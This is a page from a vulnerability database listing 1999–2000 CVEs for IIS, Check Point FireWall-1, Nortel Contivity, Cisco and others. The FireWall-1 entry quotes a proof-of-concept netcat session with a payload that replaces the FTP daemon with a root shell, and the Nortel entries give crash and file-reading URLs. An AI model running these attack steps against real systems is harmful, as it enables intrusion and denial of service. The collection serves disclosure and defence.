VARIoT IoT vulnerabilities database
VAR-200002-0025 | CVE-2000-0167 | Microsoft IIS 4.0 Pickup table of Contents DoS Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality
VAR-200002-0050 | CVE-2000-0150 | Multiple vendors' firewalls do not adequately keep state of FTP traffic |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1.
FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port.
In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services.
The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example:
"Here is an example of an attack based on this technique. There is
a FireWall-1 machine between gumpe and the 172.16.0.2 server, which
only permits incoming FTP connections. 172.16.0.2 is a default
Solaris 2.6 install, with the Tooltalk Database vulnerability.
We send the datagram directly to the service's TCP port, in spite of
this port being blocked by the firewall. Note that since there is no
response expected, the one-way restriction doesn't affect this
attack.
All of our testing was done on a Nokia IPSO machine running FW-1
version 4.0.SP-4.
[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f
/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)
There is an easier way to perform a similar attack on this setup, since
the default Solaris FTP daemon allows a bounce attack, but this should
suffice to demonstrate the potential severity of this problem."
In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine.
This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable
VAR-200001-0018 | CVE-2000-0116 | Check Point Firewall-1 Script tag check bypass vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Firewall-1 does not properly filter script tags, which allows remote attackers to bypass the "Strip Script Tags" restriction by including an extra < in front of the SCRIPT tag. Firewall-1 includes the ability to alter script tags in HTML pages before passing them to the client's browser. This alteration invalidates the tag, rendering the script unexecutable by the browser. In version 3, this function can be bypassed by adding an extra opening angle bracket. The tag will be left unmodified, and the browser will be able to execute the contained script. Hostile script could lead to a remote compromise of the client system.
Firewall-1 version 4 will alter the tag as expected
VAR-200001-0040 | CVE-2000-0063 | Nortel Contivity Switch Remote Denial of Service Attack and File Leak Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to read arbitrary files by specifying the filename in a parameter to the script. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.
A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.
Because the user input is not sufficiently filtered, if you pass metacharacters to the cgiporc program, such as "!" Or "$", the system will crash. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file in the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!", or "$" are passed to cgiproc, the system will crash (because the characters are not escaped).
foo <foo@blacklisted.intranova.net> provided the following example:
http://x.x.x.x/manage/cgi/cgiproc?$
[crash]
No evidence of this problem being exploited is saved in the logs.
foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability:
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.)
All that is written to the logs when this is exploited is below:
09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login
In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol
VAR-200001-0041 | CVE-2000-0064 | Nortel Contivity Switch Remote Denial of Service Attack and File Leak Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to cause a denial of service via a malformed URL that includes shell metacharacters. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.
A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.
Because the user input is not sufficiently filtered, if you pass metacharacters to the cgiporc program, such as "!" Or "$", the system will crash. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file in the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!", or "$" are passed to cgiproc, the system will crash (because the characters are not escaped).
foo <foo@blacklisted.intranova.net> provided the following example:
http://x.x.x.x/manage/cgi/cgiproc?$
[crash]
No evidence of this problem being exploited is saved in the logs.
foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability:
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.)
All that is written to the logs when this is exploited is below:
09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login
In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol
VAR-200001-0069 | No CVE | Intel InBusiness E-mail Workstation Security Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Intel InBusiness E-mail is a small application server. This product has a security vulnerability that allows unauthorized remote attackers to delete arbitrary files on the hard disk and change the configuration file of the e-mail workstation. Under certain conditions, remote attackers also It is possible to read the e-mail of any user in the system. Details: This e-mail workstation runs the VxWorks operating system and uses a 486 SX25 processor. A daemon called "daynad" is bound to TCP port 244. By connecting to this service port, you can execute many commands without going through any security authentication. By simply establishing a TCP connection to this port, the following commands can be executed: FormSet: After the next restart, this e- The mail workstation will be restored to the factory state. In this state, the e-mail workstation will use a DHCP server to obtain its own IP address. This also means that the attacker can connect to e without any password after the next restart. -Mail workstation and complete control of the entire device. FormProtect: After the next restart, the e-mail workstation will be restored to the factory state and all passwords will be disabled. Only reconnecting Use the FormSet command to restore to port 244. MakeDir: Create a directory on the hard disk Remove: Remove the specified file from the hard disk, which may be the user's mail or other files. Z: This command will provide a UNIX-type login prompt interface. Enter the password of the super user to enter. If the password is reset using FormSet, the attacker may log in without the password. Once logged in, the attacker may execute arbitrary commands to operate the hard disk. & Lt; * Source: Kit Knox (kit@CONNECTNET.COM) *>. e-mail
VAR-200001-0034 | CVE-2000-0056 | IMail IMonitor status.cgi DoS Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IMail IMONITOR status.cgi CGI script allows remote attackers to cause a denial of service with many calls to status.cgi. IMail includes a service called IMail Monitor which is used for local and remote performance measuring and diagnostics. It includes a small webserver operating on port 8181 to support web-based monitoring. One of the cgi scripts, status.cgi, is used to determine which services are currently running and create a web pafge to report this information. Multiple simultaneous requests for status.cgi will cause the software to crash, with a Dr. Watson error of "Invalid Memory Address". There is a vulnerability in the IMail IMONITOR status.cgi CGI script
VAR-199912-0007 | CVE-1999-1042 | Cisco Resource Manager Information disclosure vulnerability |
CVSS V2: 1.2 CVSS V3: - Severity: LOW |
Cisco Resource Manager (CRM) 1.0 and 1.1 creates world-readable log files and temporary files, which may expose sensitive information, to local users such as user IDs, passwords and SNMP community strings. Cisco Resource Manager is prone to a information disclosure vulnerability.
Attackers can exploit this issue to gain access to sensitive information
VAR-199912-0022 | CVE-1999-1100 | Cisco PIX Private Link Profile Encryption Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Cisco PIX Private Link 4.1.6 and earlier does not properly process certain commands in the configuration file, which reduces the effective key length of the DES key to 48 bits instead of 56 bits, which makes it easier for an attacker to find the proper key via a brute force attack. Cisco Pix Private Link is prone to a remote security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks
VAR-199912-0029 | CVE-1999-1126 | Cisco Resource Manager Permission permission vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Cisco Resource Manager (CRM) 1.1 and earlier creates certain files with insecure permissions that allow local users to obtain sensitive configuration information including usernames, passwords, and SNMP community strings, from (1) swim_swd.log, (2) swim_debug.log, (3) dbi_debug.log, and (4) temporary files whose names begin with "DPR_". Cisco Resource Manager is prone to a local security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks. CRM will create a file with unsafe permissions, local users can get sensitive from (1) swim_swd.log, (2) swim_debug.log, (3) dbi_debug
VAR-199912-0019 | CVE-1999-1175 | Cisco IOS Cisco Cache Engine Web Cache Control Protocol (WCCP) User Path Reset Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Web Cache Control Protocol (WCCP) in Cisco Cache Engine for Cisco IOS 11.2 and earlier does not use authentication, which allows remote attackers to redirect HTTP traffic to arbitrary hosts via WCCP packets to UDP port 2048. Cisco IOS is prone to a remote security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks. A remote attacker can reset arbitrary user access to HTTP through UDP port 2048 of WCCP packets
VAR-199912-0033 | CVE-1999-1464 | Cisco IOS Access control vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Vulnerability in Cisco IOS 11.1CC and 11.1CT with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled interface to an interface that does not have DFS enabled, as described by Cisco bug CSCdk35564. IOS is prone to a security bypass vulnerability. This vulnerability is also known as Cisco vulnerability CSCdk35564
VAR-199912-0034 | CVE-1999-1465 | Cisco IOS switching ( DFS Permission permission and access control |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Vulnerability in Cisco IOS 11.1 through 11.3 with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled input interface to an output interface with a logical subinterface, as described by Cisco bug CSCdk43862. IOS is prone to a security bypass vulnerability. Cisco IOS 11.1 to 11.3's distributed fast switching (DFS) has a vulnerability
VAR-199912-0038 | CVE-1999-1476 | Intel Pentium processor (MMX and Overdrive) Denial of service vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
A bug in Intel Pentium processor (MMX and Overdrive) allows local users to cause a denial of service (hang) in Intel-based operating systems such as Windows NT and Windows 95, via an invalid instruction, aka the "Invalid Operand with Locked CMPXCHG8B Instruction" problem. There are loopholes in Intel Pentium processor (MMX and Overdrive)
VAR-199912-0023 | CVE-1999-1102 | SGI of IRIX Vulnerabilities in products from multiple vendors such as |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
lpr on SunOS 4.1.1, BSD 4.3, A/UX 2.0.1, and other BSD-based operating systems allows local users to create or overwrite arbitrary files via a symlink attack that is triggered after invoking lpr 1000 times. SGI of IRIX Unspecified vulnerabilities exist in products from multiple vendors.None. SunOS is prone to a local security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks. SunOS 4.1.1, BSD 4.3, A/UX 2.0.1, and other BSD-based operating systems have the lpr vulnerability
VAR-199912-0051 | CVE-1999-1223 | IIS Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 3.0 allows remote attackers to cause a denial of service via a request to an ASP page in which the URL contains a large number of / (forward slash) characters. IIS is prone to a denial-of-service vulnerability
VAR-199912-0002 | CVE-1999-1451 | IIS and Site Server Winmsdp.exe Sample File Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Winmsdp.exe sample file in IIS 4.0 and Site Server 3.0 allows remote attackers to read arbitrary files. Site Server is prone to a remote security vulnerability
VAR-199912-0110 | CVE-1999-0154 | Microsoft Internet Information Services Security hole |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 2.0 and 3.0 allows remote attackers to read the source code for ASP pages by appending a . (dot) to the end of the URL. IIS is prone to a remote security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks
VAR-199912-0053 | CVE-1999-1148 | IIS FTP Service denial vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
FTP service in IIS 4.0 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via many passive (PASV) connections at the same time. IIS is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause a denial-of-service condition
VAR-199912-0159 | CVE-2000-0041 | apple's macOS Vulnerability in |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Macintosh systems generate large ICMP datagrams in response to malformed datagrams, allowing them to be used as amplifiers in a flood attack. apple's macOS Exists in unspecified vulnerabilities.None. The implementation of Open Transport in MacOS 9 includes a weakness that could allow an attacker to use the Mac as a traffic amplifier in a DoS attack against another computer.
A specially-crafted 29-byte UDP packet can be sent to a machine running MacOS 9. The Mac will then respond with a 1500 byte ICMP packet. If the first UDP packet is sent with a spoofed IP address of a third machine, and these spoofed triggger packets are sent to several MacOS 9 machines,, it will create an effective DoS of the third machine due to bandwidth starvation. There are a large number of ICMP datagram vulnerabilities in the Macintosh system. Attackers use these vulnerabilities as amplifiers to carry out attacks